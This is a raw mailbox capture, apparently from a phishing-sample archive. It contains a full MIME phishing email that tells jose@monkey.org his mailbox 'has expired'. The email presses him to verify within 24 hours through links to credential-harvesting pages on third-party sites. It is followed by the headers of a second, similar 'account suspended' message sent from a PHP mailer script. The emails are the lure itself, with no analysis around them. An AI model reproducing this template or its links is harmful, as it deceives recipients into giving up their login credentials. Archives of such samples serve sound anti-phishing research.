From: "Account Service" <info@ebitlogix.com>
Date: Tue, 10 May 2016 00:14:09 -0500
Message-Id: <20160510063342.2E334CDA49@pgt05.pragmatia.com.ar>
X-AV-Checked: ClamAV using ClamSMTP
Status: O
X-Status: 
X-Keywords:                  
X-UID: 208

You will not see this in a MIME-aware mail reader.
--===============1887224964==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body


 =

   	  =

   =

   =

   Verify Your Mailbox
        Dear jose@monkey.org, =

   =

    Your Mailbox Account Has Expired.
 We recommend that you verify and upgrade your account within 24hrs. to avo=
id De-activation. =


  =

   Upgrade your Mailbox Now
  =

 =

 =

 =

   	=20
--===============1887224964==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><DIV style=3D"WHITE-SPACE: normal; WORD-SPACIN=
G: 0px; TEXT-TRANSFORM: none; COLOR: rgb(34,34,34); FONT: small arial, sans=
-serif; WIDOWS: 1; LETTER-SPACING: normal; TEXT-INDENT: 0px; -webkit-text-s=
troke-width: 0px"><BR class=3DApple-interchange-newline>
<TABLE>
<TBODY>
<TR style=3D"FONT-SIZE: medium; FONT-FAMILY: Helvetica, 'Microsoft Yahei', =
verdana; COLOR: rgb(0,0,0)">
<TD style=3D"FONT-FAMILY: arial, verdana, sans-serif; MARGIN: 0px; LINE-HEI=
GHT: 1.666" width=3D30></TD>
<TD style=3D"FONT-FAMILY: arial, verdana, sans-serif; MARGIN: 0px; LINE-HEI=
GHT: 1.666">
<TABLE style=3D"BORDER-TOP: rgb(164,164,164) 2px solid; BORDER-RIGHT: rgb(1=
64,164,164) 2px solid; BORDER-BOTTOM: rgb(164,164,164) 2px solid; PADDING-B=
OTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; BORDER-LEFT: rgb(164,164,1=
64) 2px solid; PADDING-RIGHT: 0px; border-radius: 6px" cellSpacing=3D0 widt=
h=3D500 align=3Dcenter>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, verdana, sans-serif; MARGIN: 0px; LINE-HEI=
GHT: 1.666" height=3D40></TD></TR>
<TR>
<TD style=3D"FONT-FAMILY: arial, verdana, sans-serif; MARGIN: 0px; LINE-HEI=
GHT: 1.666">
<TABLE width=3D460 align=3Dcenter>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, verdana, sans-serif; MARGIN: 0px; LINE-HEI=
GHT: 1.666"><FONT size=3D+3 face=3Dcalibri>Verify Your Mailbox</FONT></TD><=
/TR></TBODY></TABLE></TD></TR>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" height=3D20><FONT=
 face=3D"arial, verdana, sans-serif">&nbsp; &nbsp; &nbsp; Dear jose@monkey.=
org,&nbsp;</FONT></TD></TR>
<TR>
<TD style=3D"FONT-FAMILY: arial, verdana, sans-serif; MARGIN: 0px; LINE-HEI=
GHT: 1.666">
<TABLE width=3D460 align=3Dcenter>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, verdana, sans-serif; MARGIN: 0px; LINE-HEI=
GHT: 1.666"><FONT size=3D3 face=3Dcalibri>
<P>Your Mailbox Account&nbsp;Has Expired.</P>
<P>We recommend that you verify and upgrade your account within 24hrs.&nbsp=
;to avoid De-activation.&nbsp;</P></FONT></TD></TR></TBODY></TABLE></TD></T=
R>
<TR>
<TD style=3D"FONT-FAMILY: arial, verdana, sans-serif; MARGIN: 0px; LINE-HEI=
GHT: 1.666" height=3D20></TD></TR>
<TR>
<TD style=3D"FONT-FAMILY: arial, verdana, sans-serif; MARGIN: 0px; LINE-HEI=
GHT: 1.666" bgColor=3D#585858 height=3D60>
<DIV align=3Dcenter><A style=3D"TEXT-DECORATION: none; COLOR: rgb(0,127,168=
)" href=3D"http://seminariorelagres.org/dobox/verify.htm" target=3D_blank d=
ata-saferedirecturl=3D"https://www.google.com/url?hl=3Den&amp;q=3Dhttp://cl=
aspeducacional.com.br//cici/verify.htm&amp;source=3Dgmail&amp;ust=3D1462932=
299101000&amp;usg=3DAFQjCNFBe81FPk0a8h-SVrVPofXt7fXqcA"><FONT color=3D#ffff=
ff face=3Dverdana><B>Upgrade your Mailbox Now</B></FONT></A></DIV></TD></TR>
<TR>
<TD style=3D"FONT-FAMILY: arial, verdana, sans-serif; MARGIN: 0px; LINE-HEI=
GHT: 1.666" height=3D20></TD></TR></TBODY></TABLE></TD></TR>
<TR style=3D"FONT-SIZE: medium; FONT-FAMILY: Helvetica, 'Microsoft Yahei', =
verdana; COLOR: rgb(0,0,0)"></TR></TBODY></TABLE></DIV>
<DIV style=3D"WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none;=
 COLOR: rgb(34,34,34); FONT: small arial, sans-serif; WIDOWS: 1; LETTER-SPA=
CING: normal; TEXT-INDENT: 0px; -webkit-text-stroke-width: 0px"><BR>
<TABLE style=3D"BORDER-TOP: rgb(170,171,182) 1px solid">
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; WIDTH: 55px; PADDING-TOP: 13px=
; MARGIN: 0px"><A style=3D"COLOR: rgb(17,85,204)" href=3D"http://claspeduca=
cional.com.br//cici/verify.htm" target=3D_blank data-saferedirecturl=3D"htt=
ps://www.google.com/url?hl=3Den&amp;q=3Dhttp://claspeducacional.com.br//cic=
i/verify.htm&amp;source=3Dgmail&amp;ust=3D1462932299101000&amp;usg=3DAFQjCN=
FBe81FPk0a8h-SVrVPofXt7fXqcA"><IMG src=3D"https://ipmcdn.avast.com/images/2=
016/icons/icon-envelope-tick-round-orange-v1.png"></A></TD>
<TD style=3D"FONT-SIZE: 13px; FONT-FAMILY: Arial, Helvetica, sans-serif; WI=
DTH: 470px; COLOR: rgb(65,66,78); PADDING-TOP: 15px; MARGIN: 0px; LINE-HEIG=
HT: 18px"></TD></TR></TBODY></TABLE></DIV></BODY></HTML>
--===============1887224964==--

From jose@monkey.org Wed May 11 06:15:04 2016 +0000
Return-Path: anonymous@server.pprdirect.com
Delivered-To: jose@monkey.org
X-FDA: 71501748528.06.clam05_2bf878c296818
X-Spam-Summary: 10,1,0,e721710c67c50cf4,d41d8cd98f00b204,anonymous@server.pprdirect.com,:,RULES_HIT:41:72:355:375:379:474:495:540:541:543:800:962:966:967:969:973:978:983:988:989:1133:1189:1208:1224:1260:1263:1313:1314:1324:1345:1381:1431:1433:1434:1436:1437:1516:1517:1534:1542:1568:1571:1588:1589:1593:1594:1685:1711:1714:1730:1747:1777:1792:2196:2198:2199:2200:2393:2525:2527:2528:2543:2560:2563:2682:2685:2828:2859:2890:2894:2901:2921:2933:2937:2939:2942:2945:2947:2951:2954:3022:3040:3138:3139:3140:3141:3142:3865:3867:3868:3870:3871:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4362:4385:4552:5007:6261:6630:6658:6674:6678:7903:8516:8599:8603:8987:9025:9059:9072:9388:9411:9416:9908:10007:10049:11480:11656:11657:11658:11914:12043:12050:12051:12555:12698:12737:12955:12958:12959:12961:13025:13132:13231:13374:13439:14181:14596:14721:21080:21325:21347:21433:21434,0,RBL:error,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:error,Cu
X-HE-Tag: clam05_2bf878c296818
X-Filterd-Recvd-Size: 3664
Received: from server.pprdirect.com (server.pprdirect.com [216.25.6.50])
	by imf20.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed, 11 May 2016 06:15:02 +0000 (UTC)
Received: (qmail 14906 invoked by uid 48); 10 May 2016 21:47:06 -0400
Date: 10 May 2016 21:47:06 -0400
Message-ID: <20160511014706.14900.qmail@server.pprdirect.com>
To: jose@monkey.org
Subject: Note: Your email account has been temporarily suspended.
X-PHP-Originating-Script: 48:maxo.php
MIME-Version: 1.0
Content-type: text/html; charset=iso-8859-1
